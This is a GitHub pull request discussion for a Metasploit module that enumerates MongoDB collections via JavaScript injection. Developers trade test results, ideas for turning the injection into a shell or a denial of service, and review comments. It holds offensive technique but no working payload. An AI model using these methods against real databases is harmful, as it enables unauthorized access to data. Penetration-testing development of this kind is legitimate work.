-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Generic MongoDB javascript injection collection enumeration #3430
Conversation
This module was tested against a small php application I wrote interfacing with MongoDB 2.2.7 https://gist.github.com/brandonprry/c2de8ac2be825007c4de
FWIW, this worked against both un-named application and my small PHP script. I am not 100% sure I am not making poor assumptions about application behavior. This type of module could probably be updated to accommodate another application found that may behave slightly differently. |
This adds a bit more error handling, and better decision making in regards to false responses.
No need to make extra requests. Off by one.
Bah, I have broken something. |
Fix some logic bugs that caused incorrect results.
Unborked |
Testing, thank you. |
Let me know if you run into issues. I ended up needing to use php -S and not apache to host the vuln app. Had a difficult time getting apache to play nice with loading the mongodb driver for some reason. Used CentOS since installing older release versions of software tends to be a bit easier on it. |
Having any issues? |
@brandonprry this is javascript injection into v8 right? I think there could be some sneakier things to do here. Did you try to poke around at what is accessible to js? For example, injected js has some global scope:
Modifications to objects in this scope seem to get persisted across requests, so there is maybe some way to either
|
I did, I was not able get a shell with it, and I am not sure why having The JS interpreter in the the 'mongo' shell has powers that the $where On Tue, Jun 10, 2014 at 2:11 AM, jvennix-r7 notifications@github.com
http://volatile-minds.blogspot.com -- blog |
Aw okay. Looking at the source most things appear pretty sandboxed. I couldn't figure out where the Persisted js could be used to dos, e.g. replace Function.prototype.call with |
Yes, the db object was removed in 2.4. The original app I tested was 2.2.7 and that was what I installed in my demo box with the vuln PHP script linked in the first post. |
Ah, reading the module description helps too :) Okay, that makes sense now. |
In newer mongo looks like
So there may still be ways to get this to work past 2.4. Assuming db shares its object graph with the execution context, maybe something like this:
Will give this a shot after I have the php bits set up. |
That would be so awesome. :) On Tue, Jun 10, 2014 at 11:07 AM, jvennix-r7 notifications@github.com
http://volatile-minds.blogspot.com -- blog |
Played around in the mongo shell for a bit just now. Looks like the Now to go report the mongod crashes I ran into while testing this :( |
Thanks for testing. :) |
Doing a bit of research on DBRef, maybe we can instantiate it ourselves? http://mongodb.github.io/node-mongodb-native/api-bson-generated/db_ref.html However, we may not have access to the ctor either, read the big green box at the bottom of this page: http://docs.mongodb.org/manual/reference/operator/query/where/ EDIT: Actually, I see DBRef in that box. So that might work? |
@brandonprry hrm... well looks I can instantiate it fine, but the
So I am thinking, Frustrating. |
Boo, oh well. |
Okay, grabbing a version < 2.4 to test this module out. Thanks for putting up with my incessant and verbose spelunkage into mongo's V8 integration :) |
Hahaha no worries at all dude, lets make the module the best it can be! Sent from a computer
|
Verification tests performed:
|
Oh man, so close. There was one bug, otherwise it scraped all the collections just fine. Here are the collections in my db:
And here is the result of running the module:
So somewhere along the way the "D" in the "testData" db was dropped. Additionally, it does not seem to find the "." in the collection names. I think you need to add upcase chars and the "." char to your charset |
Damn, nice catch. I can update this tonight after work. |
Also if you could serialize the collection names into json and |
Yeah, that's cool too. Wasn't sure if that would be useful. |
Cool, I'll take a look again tomorrow. I played with injecting some I did discover that memory addresses are leaked to javascript as "threadId" attributes of the system status, which coud make the |
Also, if the mongo instance is sharded or replicated (requires command line args when starting |
Yeah, that was something I fought with in my head, what makes sense in the context of Metasploit? I felt like collection enumeration did enough to prove exploitability without needing to make a full-blown sqlmap clone as a module. |
Agreed, this module has a good balance of being lightweight while still remaining valuable to a pentester who encounters a mongo injection. |
|
||
vprint_status("Getting collection names") | ||
|
||
(0..length-1).each do |i| |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
You can use an exclusive (...
) range here instead of limit-1
, although length.times do |i|
is a bit easier to read.
Updated, I went ahead and used the exclusive operator for the loop. |
|
And, for thoroughness sake, here is a run on one of the other syntaxes.
|
Works well, merging |
Awesome, dude! Thanks so much! |
@jvennix-r7 thanks for landing this, but please check msftidy.rb when you do; there's a quickie howto here: Travis-CI will be doing this automatically soon so we don't have to rely on individual commiters to check this every time. |
Oh no! It was passing msftidy, but I admit I didn't run it on the last On Thu, Jun 12, 2014 at 1:25 PM, Tod Beardsley notifications@github.com
http://volatile-minds.blogspot.com -- blog |
This module was tested against a small php application I wrote interfacing with MongoDB 2.2.7. It should be generic enough to work against a few injection vectors. It is based on a vuln I found in an un-named application. The code was inspired by official php documentation example three.
https://gist.github.com/brandonprry/c2de8ac2be825007c4de
http://www.php.net//manual/en/mongocollection.find.php
The technique used to enumerate the collections is only available in version of MongoDB prior to 2.4. I tested against MongoDB 2.2.7.